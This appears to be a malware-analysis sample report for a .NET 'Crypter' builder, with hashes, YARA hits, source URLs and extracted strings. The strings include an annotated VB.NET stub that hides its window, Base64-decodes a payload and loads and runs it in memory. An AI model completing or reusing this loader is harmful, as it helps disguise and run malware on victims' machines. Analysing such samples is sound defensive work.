Sample details: 43d7542b89444de734fb1bc171e16cf1 --

Hashes
MD5: 43d7542b89444de734fb1bc171e16cf1
SHA1: 2d0829ad52980bd985f0a5b4e4edd3453ca0ae63
SHA256: 6471c15e3635b6b435d0a216599da44dbdcf3198a8c6c6ce1f99bd00e86d1a3f
SSDEEP: 384:s8RBQoOz8JIR5B14LOewx4kvP96uEsLaDHFhMoC7TwjUjJ684ZLk2459Ba3Xxsz6:s83QNQ21vElC5gM2dsz+bfM
Details
File Type: PE32
Yara Hits
YRP/Microsoft_Visual_Studio_NET | YRP/Microsoft_Visual_C_v70_Basic_NET_additional | YRP/Microsoft_Visual_C_Basic_NET | YRP/Microsoft_Visual_Studio_NET_additional | YRP/Microsoft_Visual_C_v70_Basic_NET | YRP/NET_executable_ | YRP/NET_executable | YRP/NETexecutableMicrosoft | YRP/IsPE32 | YRP/IsNET_EXE | YRP/IsWindowsGUI | YRP/HasDebugData | YRP/IsBeyondImageSize | YRP/domain | YRP/IP | YRP/contentis_base64 | FlorianRoth/DragonFly_APT_Sep17_3 |
Source
http://103.68.190.250/Sources//ActiveMalwares/Spliter/spliter/bin/Debug/Crypter.exe
http://103.68.190.250/Sources//ActiveMalwares/Spliter/spliter/obj/Debug/Crypter.exe
Strings
		!This program cannot be run in DOS mode.
`.sdata
@.reloc
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPU8y|
' [Analyst annotation: the comment lines in this block are not part of the extracted strings.]
' VB.NET source text carried inside the sample as a string. It reads as a stub
' template: "maloumat" and "rahj" are neither valid statements nor declared names
' here, so they are presumably placeholders substituted before the stub is
' compiled (TODO confirm against the builder logic).
Public Class Form1 
' Handler for the form's Load event.
Public Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
' The next four statements keep the window out of sight: hidden, no taskbar
' entry, no icon, fully transparent.
Me.Hide()
Me.ShowInTaskbar = False
Me.ShowIcon = False
Me.Opacity = 0
' Bare token; presumably a placeholder for generated declarations, since
' paracetamol1 is used below but never declared in this fragment (verify).
maloumat
Dim str2 As String = ""
Dim num3 As Integer = paracetamol1.Length
Dim i As Integer = 1 
' Counts i from 1 up to paracetamol1.Length. The closing Loop statement is
' absent from the extracted text, so the fragment is incomplete as shown.
Do While (i <= num3) 
' "rahj" is undeclared here; presumably a placeholder for the expression that
' assembles str2 (verify).
str2 = rahj
i += 1
' Base64-decodes str2 and loads the resulting bytes as an assembly into the
' current AppDomain. The assembly comes from a byte array, not from a file path.
Dim best As Object = AppDomain.CurrentDomain.Load(Convert.FromBase64String(str2))
' Late-bound call to the loaded assembly's entry point, passing Nothing for both
' the target object and the argument list.
Dim gest As String = best.EntryPoint.Invoke(Nothing, Nothing)
End Sub
End Class
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
fSystem.Drawing.Icon, System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aBj
QSystem.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
v2.0.50727
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
Crypter.My
MyComputer
MyProject
MyForms
MyWebServices
ThreadSafeObjectProvider`1
Crypter
Resources
Crypter.My.Resources
MySettings
MySettingsProperty
Microsoft.VisualBasic.ApplicationServices
WindowsFormsApplicationBase
.cctor
__ENCAddToList
System.Collections.Generic
List`1
System
WeakReference
__ENCList
OnCreateMainForm
Microsoft.VisualBasic.Devices
Computer
Object
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_Forms
m_MyFormsObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
get_Form1
m_Form1
set_Form1
Create__Instance__
System.Windows.Forms
Instance
Dispose__Instance__
instance
System.Collections
Hashtable
m_FormBeingCreated
Equals
GetHashCode
GetType
ToString
get_GetInstance
m_ThreadStaticValue
GetInstance
Dispose
disposing
System.ComponentModel
IContainer
components
InitializeComponent
Button
_Button1
get_Button1
set_Button1
WithEventsValue
_Button2
get_Button2
set_Button2
TextBox
_TextBox1
get_TextBox1
set_TextBox1
NumericUpDown
_NumericUpDown1
get_NumericUpDown1
set_NumericUpDown1
_TextBox2
get_TextBox2
set_TextBox2
_Button3
get_Button3
set_Button3
_Button4
get_Button4
set_Button4
_Button5
get_Button5
set_Button5
_Button7
get_Button7
set_Button7
EventArgs
Button1_Click
sender
Button2_Click
NumericUpDown1_ValueChanged
Form1_Load
ProgressBar1_Click
Button3_Click
Button4_Click
Button5_Click
Button7_Click
PictureBox1_Click
Button1
Button2
TextBox1
NumericUpDown1
TextBox2
Button3
Button4
Button5
Button7
System.Resources
ResourceManager
resourceMan
System.Globalization
CultureInfo
resourceCulture
get_ResourceManager
get_Culture
set_Culture
get_stub
Culture
System.Configuration
ApplicationSettingsBase
defaultInstance
addedHandler
addedHandlerLockObject
AutoSaveSettings
get_Default
Default
get_Settings
Settings
System.Threading
Monitor
get_Count
get_Capacity
get_Item
get_IsAlive
set_Item
RemoveRange
set_Capacity
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
get_UseCompatibleTextRendering
SetCompatibleTextRenderingDefault
AuthenticationMode
set_IsSingleInstance
set_EnableVisualStyles
set_SaveMySettingsOnExit
ShutdownMode
set_ShutdownStyle
set_MainForm
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
STAThreadAttribute
DebuggerNonUserCodeAttribute
DebuggerStepThroughAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
ArgumentException
System.Reflection
TargetInvocationException
Control
get_IsDisposed
RuntimeTypeHandle
GetTypeFromHandle
ContainsKey
String
GetResourceString
InvalidOperationException
Activator
CreateInstance
ProjectData
Exception
SetProjectError
get_InnerException
get_Message
ClearProjectError
Remove
Component
MyGroupCollectionAttribute
ThreadStaticAttribute
System.Runtime.InteropServices
ComVisibleAttribute
CompilerGeneratedAttribute
EventHandler
add_Load
IDisposable
ComponentResourceManager
System.Drawing
Decimal
ISupportInitialize
BeginInit
SuspendLayout
get_DarkMagenta
ButtonBase
set_BackColor
get_White
set_ForeColor
set_Location
set_Name
set_Size
set_TabIndex
set_Text
set_UseVisualStyleBackColor
get_Black
UpDownBase
set_Value
TextBoxBase
set_MaxLength
set_Multiline
ScrollBars
set_ScrollBars
ContainerControl
set_AutoScaleDimensions
AutoScaleMode
set_AutoScaleMode
SystemColors
get_ActiveCaptionText
ImageLayout
set_BackgroundImageLayout
set_ClientSize
ControlCollection
get_Controls
FontStyle
GraphicsUnit
set_Font
get_Gray
GetObject
set_Icon
get_ControlDarkDark
set_TransparencyKey
EndInit
ResumeLayout
PerformLayout
remove_Click
add_Click
remove_ValueChanged
add_ValueChanged
OpenFileDialog
FileDialog
set_Filter
CommonDialog
DialogResult
ShowDialog
get_FileName
FolderBrowserDialog
get_Value
Conversions
get_Text
System.IO
ReadAllBytes
Convert
ToBase64String
get_SelectedPath
Concat
WriteAllText
get_Length
ToDouble
ToInteger
Strings
Replace
Interaction
MsgBoxResult
MsgBoxStyle
MsgBox
IsNullOrEmpty
set_SelectionStart
set_SelectionLength
SaveFileDialog
Operators
CompareString
set_Title
set_FileName
DesignerGeneratedAttribute
AccessedThroughPropertyAttribute
ReferenceEquals
Assembly
get_Assembly
GetString
SettingsBase
Synchronized
get_SaveMySettingsOnExit
ObjectFlowControl
CheckForSyncLockOnValueType
ShutdownEventHandler
add_Shutdown
DebuggableAttribute
DebuggingModes
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
AssemblyFileVersionAttribute
GuidAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
Crypter.exe
Crypter.Resources.resources
Crypter.Form1.resources
MyTemplate
8.0.0.0
My.User
My.Application
My.Computer
My.Forms
My.WebServices
System.Windows.Forms.Form
Create__Instance__
Dispose__Instance__
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
Button5
Button4
Button3
TextBox2
NumericUpDown1
TextBox1
Button2
Button1
Button7
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
12.0.0.0
My.Settings
WrapNonExceptionThrows
1.0.0.0
$311ad671-943c-4438-9ab6-546a39e225e3
Copyright 
  2015
spliter
_CorExeMain
mscoree.dll
,fCN8=D
C:\Users\xes\Desktop\Crypter By Ben Moh\spliter\obj\Debug\Crypter.pdb
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>